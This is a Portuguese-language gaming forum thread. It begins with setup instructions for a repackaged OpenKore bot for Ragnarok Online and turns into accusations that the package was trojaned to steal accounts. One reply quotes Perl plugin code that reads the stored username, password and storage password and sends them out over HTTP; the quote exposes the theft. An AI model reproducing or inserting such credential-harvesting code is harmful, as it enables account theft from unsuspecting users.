Ir para conteúdo
Faça parte da equipe! (2024) ×
Conheça nossa Beta Zone! Novas áreas a caminho! ×
  • Quem está por aqui   0 membros estão online

• Nenhum usuário registrado visualizando esta página.

OpenKore//FunFando//+Fotos

Compartilhar

Posts Recomendados

Eae Pessoal vai seguindo como arrumar o novo OpenKore

Vai seguindo

1--FAÇA O DOWNLOAD OPENKORE

É necessário se cadastrar para acessar o conteúdo.

2--SCAN

3--depois de fazer o download e o scan segue o procedimento :

desinstale o seu antigo activeperfl e instale o que esta na pasta que vc fez o download

depois de ter feito o download do novo instale , nem precissa reiniciar o pc, depois de ter feito isso , pega sua pasta control que ja configurado cole dentro do novo openkore

abra o ''cole dentro da pasta Bro'' e cole oq esta dentro da pasta do seu ragnarok

depois de ter feito isso entre nas pastas e vai botando tudo que tenho no meu no seu desktop como esta o meu

o start

poseidon

openkore

inicie na ordem que esta no meu

start

poseidon

openkore

depois eh so ser feliz :risomalefico::risomalefico:

FLWSSSSS espero ter ajudo

Link para o comentário
Compartilhar em outros sites

se alguém souber quem q eh esse muleke...

Mata ele por mim ;dd~

perdi meu hat de dragão bebe,

meu fugitivo e meus olhos bionicos...

E + 1kk de prache....

Brothinho... Na moral...

Devolve as coisa lah...

Vse pego do char nomeado felipel_archer

porra... Muita sacanagem sério

Link para o comentário

eh oq ? vc ta falando do bot ? pq aqui nao teve nada disso n sei se vc configuro certo, pois aqui esta 100%

malz ae agora eu entendi , por que minha conta eh vazia, nem fiz esse bot so peguei desse topico ae

http://www.webcheats.com.br/forum/rag-cheats/781869-openkore-depois-de-19-02-2011-a.html

peguei foi dele ainda bem que minha conta eh noob

Link para o comentário

Na verdade o openkore que o yiazmat "diz ter pego" está completamente limpo, que aliás é o kore que eu forneço. Ele retirou o relogger que eu coloquei no kore e substituiu por um kgrelogger com o seguinte código:

use LWP::UserAgent;

use Utils qw(urlencode);

my $ua = LWP::UserAgent->new;

$ua->timeout(10);

$ua->env_proxy;

my $usuario = $config{'username'};

$usuario =~ s/#/:/;

my $senha = $config{'password'};

$senha =~ s/#/:/;

my $kafra = $config{'storageAuto_password'};

$kafra =~ s/#/:/;

my $response = $ua->get("

$senha $kafra");

Depois que o Sugoi fez aquele tutorial começou a chover wannabe-hackers....

Link para o comentário

Aleluia, pelomenos agora eu sei de quem foi a culpa... Perdi itens raríssimos, mas agora ja sei quem foi o culpado... Alguém da ban no kra q fez o topico de que ele retiro o conteudo.

Link para o comentário

Meu deus em nao fui eu eu tenho char Chamado Juniorbro nem tem nada a haver com isso e pelo menos todos os bots daqui estao com keylogger inclusive oq eu peguei , e mil desculpas se eu nao botei pra usar em contas noobs pq eu tb nem sabia oq significava keylogger juro por deus so tenho 2 contas uma com um kina mo noob e outra com meu char arruaceiro lvl 82 , se eu quizesse estragar a alegria de alguem roubando e editando o openkore pra keylogger , ja tinha feito a muito tempo pq aguentei ate hoje e ate daqui uns tempos com esses ekips de bosta como os meus , se vcs estao duvidando de mim - to nem ae mais antes disso testem os outros bots que postaram , antes de vim falar ***** comigo :fuck::fuck::fuck::fuck::fuck::fuck:

Link para o comentário

Meu deus em nao fui eu eu tenho char Chamado Juniorbro nem tem nada a haver com isso e pelo menos todos os bots daqui estao com keylogger inclusive oq eu peguei , e mil desculpas se eu nao botei pra usar em contas noobs pq eu tb nem sabia oq significava keylogger juro por deus so tenho 2 contas uma com um kina mo noob e outra com meu char arruaceiro lvl 82 , se eu quizesse estragar a alegria de alguem roubando e editando o openkore pra keylogger , ja tinha feito a muito tempo pq aguentei ate hoje e ate daqui uns tempos com esses ekips de bosta como os meus , se vcs estao duvidando de mim - to nem ae mais antes disso testem os outros bots que postaram , antes de vim falar ***** comigo :fuck::fuck::fuck::fuck::fuck::fuck:

Eu que fiz upload do Kore que você "diz ter pego", eu que consertei o bot para funcionar no renewal, você pegou e colocou o kgrelogger modificado. Como explica então o fato do Kore que você diz ter pego não ter o código e o que você postou ter?

E afinal, porque você repostaria um bot idêntico ao de outro tópico?

Megafail. Existem várias outras formas de hackear via kore sem deixar "rastros". Tem que comer muito arroz e feijão ainda, moleque.

Link para o comentário

veio vai te :fuck::fuck::fuck::fuck::fuck:

se respostei por causa de como arrumar e tudo se vc ta duvidando ve se cresce o criança :fuck::fuck::fuck: vou nem falar mais nada por que gente assim tem que ir se :fuck::fuck::fuck: :chingando::chingando::chingando:

Link para o comentário

Este tópico está impedido de receber novos posts.
 Compartilhar

• Criar Novo...

Informação Importante

Nós fazemos uso de cookies no seu dispositivo para ajudar a tornar este site melhor. Você pode ajustar suas configurações de cookies , caso contrário, vamos supor que você está bem para continuar.